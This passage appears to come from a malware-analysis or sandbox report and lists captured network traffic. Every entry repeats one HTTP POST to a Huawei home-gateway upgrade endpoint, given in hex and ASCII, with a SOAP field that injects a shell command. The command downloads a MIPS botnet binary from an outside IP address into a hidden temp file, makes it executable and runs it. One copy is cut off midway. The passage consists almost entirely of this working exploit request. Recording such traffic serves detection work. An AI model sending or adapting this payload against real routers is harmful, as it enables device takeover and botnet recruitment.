s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima hua
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
